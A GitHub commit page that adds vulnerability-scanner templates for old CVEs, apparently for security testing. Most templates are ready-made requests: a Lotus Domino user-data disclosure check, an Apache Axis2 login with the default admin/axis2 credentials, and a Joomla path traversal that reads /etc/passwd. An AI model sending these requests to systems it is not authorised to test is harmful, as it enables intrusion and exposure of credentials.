-
Notifications
You must be signed in to change notification settings - Fork 52
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
test
committed
Aug 29, 2024
1 parent
dfd6778
commit b137f1e
Showing
3,626 changed files
with
74,299 additions
and
720,195 deletions.
The diff you're trying to view is too large. We only load the first 3000 changed files.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file was deleted.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,32 @@ | ||
id: CVE-2000-0114 | ||
|
||
info: | ||
name: Microsoft FrontPage Extensions Check (shtml.dll) | ||
author: r3naissance | ||
severity: low | ||
description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory. | ||
reference: | ||
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114 | ||
- https://www.exploit-db.com/exploits/19897 | ||
classification: | ||
cve-id: CVE-2000-0114 | ||
remediation: Upgrade to the latest version. | ||
tags: cve,cve2000,frontpage,microsoft | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/_vti_inf.html' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
part: body | ||
words: | ||
- "_vti_bin/shtml.dll" | ||
|
||
# Enhanced by mp on 2022/01/27 |
File renamed without changes.
This file was deleted.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,25 @@ | ||
id: CVE-2005-2428 | ||
info: | ||
name: CVE-2005-2428 | ||
author: CasperGN | ||
severity: medium | ||
|
||
description: Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696. | ||
reference: | ||
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf | ||
- https://www.exploit-db.com/exploits/39495 | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/names.nsf/People?OpenView" | ||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
- type: regex | ||
name: domino-username | ||
regex: | ||
- '(<a href\=\"/names\.nsf/[0-9a-z\/]+\?OpenDocument)' | ||
part: body |
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,49 @@ | ||
id: CVE-2010-0219 | ||
|
||
info: | ||
name: Apache Axis2 Default Login | ||
author: pikpikcu | ||
severity: high | ||
description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service. | ||
tags: cve,cve2010,axis,apache,default-login,axis2 | ||
reference: | ||
- https://nvd.nist.gov/vuln/detail/CVE-2010-0219 | ||
- https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html | ||
classification: | ||
cve-id: CVE-2010-0219 | ||
|
||
requests: | ||
- raw: | ||
- | | ||
POST /axis2-admin/login HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
loginUsername={{username}}&loginPassword={{password}} | ||
- | | ||
POST /axis2/axis2-admin/login HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
userName={{username}}&password={{password}}&submit=+Login+ | ||
payloads: | ||
username: | ||
- admin | ||
password: | ||
- axis2 | ||
attack: pitchfork | ||
|
||
matchers-condition: and | ||
matchers: | ||
|
||
- type: word | ||
words: | ||
- "<h1>Welcome to Axis2 Web Admin Module !!</h1>" | ||
|
||
- type: status | ||
status: | ||
- 200 | ||
|
||
# Enhanced by mp on 2022/03/02 |
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,28 @@ | ||
id: CVE-2010-1873 | ||
|
||
info: | ||
name: Joomla! Component Jvehicles SQL Injection | ||
author: daffainfo | ||
severity: high | ||
description: A SQL injection vulnerability in the Jvehicles (com_jvehicles) component 1.0, 2.0, and 2.1111 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php. | ||
reference: | ||
- https://www.exploit-db.com/exploits/11997 | ||
- https://www.cvedetails.com/cve/CVE-2010-1873 | ||
tags: cve,cve2010,joomla,lfi,sql-injection | ||
classification: | ||
cve-id: CVE-2010-1873 | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00" | ||
matchers-condition: and | ||
matchers: | ||
- type: regex | ||
regex: | ||
- "root:.*:0:0:" | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
# Enhanced by mp on 2022/03/20 |
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
This file was deleted.
Oops, something went wrong.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
Oops, something went wrong.